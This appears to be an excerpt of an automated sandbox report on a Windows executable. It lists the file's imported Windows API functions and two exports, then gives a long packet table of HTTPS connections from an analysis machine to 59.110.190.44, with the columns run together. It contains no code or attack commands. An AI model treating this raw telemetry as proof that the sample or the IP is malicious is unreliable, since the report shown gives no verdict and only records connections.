KERNEL32.dll | SetStdHandle, WriteConsoleW, GetProcAddress, ExitProcess, HeapAlloc, GetProcessHeap, GetModuleHandleW, LoadLibraryW, GetFileAttributesW, CreateFileW, GetUserDefaultUILanguage, GetModuleFileNameW, GetStdHandle, GetCommandLineW, RaiseException, SetFilePointerEx, HeapReAlloc, HeapSize, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, FlushFileBuffers, WriteFile, CloseHandle, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, RtlUnwindEx, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetFileType, GetCurrentProcess, GetModuleFileNameA, TerminateProcess, GetModuleHandleExW, GetACP, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetConsoleCP, VirtualAlloc, HeapFree
SHELL32.dll | CommandLineToArgvW
USER32.dll | MessageBoxExW
SHLWAPI.dll | StrCmpW
Name | Ordinal | Address
AmdPowerXpressRequestBetterBatteryLife | 1 | 0x140019900
NvOptimusDisablement | 2 | 0x140019904
Language of compilation system | Country where language is spoken
English | United States


                                            • Total Packets: 748
                                            • 443 (HTTPS)
                                            • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 9, 2025 04:28:30.250967979 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.520776033 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.520900965 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521414995 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521425009 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.521619081 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521622896 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.863907099 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.863938093 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864032030 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864059925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864072084 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864106894 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864114046 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864170074 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864634037 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864691019 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101142883 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101190090 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101265907 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101274967 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101309061 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101332903 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104748964 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104784012 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104814053 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104820013 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104842901 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104862928 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104938984 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104980946 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104996920 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105000973 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105010986 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105022907 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105050087 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105055094 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105098963 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.316834927 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.316946983 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.316958904 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.316970110 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317008018 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317576885 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317617893 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317636013 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317645073 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317658901 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317677021 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.318090916 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.318145037 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.318322897 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.318375111 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319000959 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319057941 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319145918 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319189072 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319901943 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319935083 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319952965 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319958925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319969893 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319994926 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.320610046 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.320664883 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.320777893 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.320827007 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.321491003 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.321542978 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.321573973 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.321628094 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532617092 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532675028 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532691956 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532711029 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532722950 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532751083 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532823086 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532874107 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533083916 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533134937 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533154964 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533196926 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533600092 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533653975 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533755064 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533799887 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533999920 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534045935 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534143925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534198046 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534202099 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534241915 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534243107 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534290075 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.580327034 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.580370903 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.604470968 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604532957 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.604624987 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604839087 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604856014 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.838246107 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.838345051 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839112997 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839126110 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.839406967 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839411974 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182432890 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182459116 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182548046 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.182565928 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182617903 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.182997942 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183053017 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183053970 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.183064938 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183096886 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.183119059 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.428556919 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.428708076 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.428760052 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.428814888 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.429265022 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429397106 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429450035 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.429466009 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429481983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430152893 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430207014 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430219889 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430255890 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430258989 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430273056 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430299997 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430325985 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.431282043 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.431343079 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646708012 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646807909 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646836996 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646869898 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646887064 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646915913 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647236109 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647284985 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647419930 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647470951 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647608995 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647653103 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.648204088 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.648258924 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.648394108 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.648453951 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649137974 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649203062 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649214983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649221897 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649245977 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649256945 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649413109 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649467945 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650099039 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650137901 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650151968 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650163889 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650176048 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650197983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650895119 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650954008 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873430014 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873512030 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873560905 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873605967 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873758078 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873802900 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873965025 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874010086 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874221087 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874265909 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874351978 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874455929 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874489069 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874532938 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874892950 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874943018 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874954939 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874973059 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874996901 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.875026941 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.938842058 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.938883066 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.971976042 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972028971 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.972155094 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972371101 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972388983 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.193969011 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.194051027 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.199845076 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.199856997 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.200026989 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.200032949 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.538960934 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539031982 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539083958 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539096117 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539120913 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539172888 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539546013 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539602041 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539609909 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539616108 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539645910 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539663076 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539666891 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539686918 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539702892 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539726019 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.541183949 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.541197062 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.553699970 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.553749084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.553819895 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.554073095 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.554083109 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800023079 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800184965 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800764084 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800777912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800970078 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800975084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159580946 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159607887 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159708023 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159739971 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159753084 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159781933 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159924984 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159977913 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.160042048 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.160090923 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.381927013 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382097960 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.382177114 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382234097 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.382360935 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382414103 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.383119106 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.383189917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.384018898 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255707979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255712032 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255740881 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256021023 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256064892 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256089926 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256119967 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256129026 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256133080 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256150007 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256150961 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256165981 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256170034 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256195068 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256220102 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338716030 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338789940 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338871002 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338918924 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338921070 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338931084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338965893 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339129925 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339155912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339190006 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339200020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339222908 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339236021 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339462996 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339494944 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339514017 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339519978 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339546919 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339565039 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339719057 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339766979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339946985 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339997053 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340193987 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340225935 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340245962 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340250969 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340261936 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340282917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340287924 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340306997 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340312958 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340326071 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340351105 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340907097 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340938091 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340949059 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340965033 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340981960 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340986967 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340998888 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341006994 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341036081 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341041088 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341094971 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341578960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341615915 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341629982 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341634035 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341650963 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341662884 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341681004 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341684103 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341692924 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341713905 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341747999 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342061043 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342093945 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342118979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342123985 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342139006 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342166901 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342231035 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342263937 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342291117 CET4434968559.110.190.44192.168.2.7
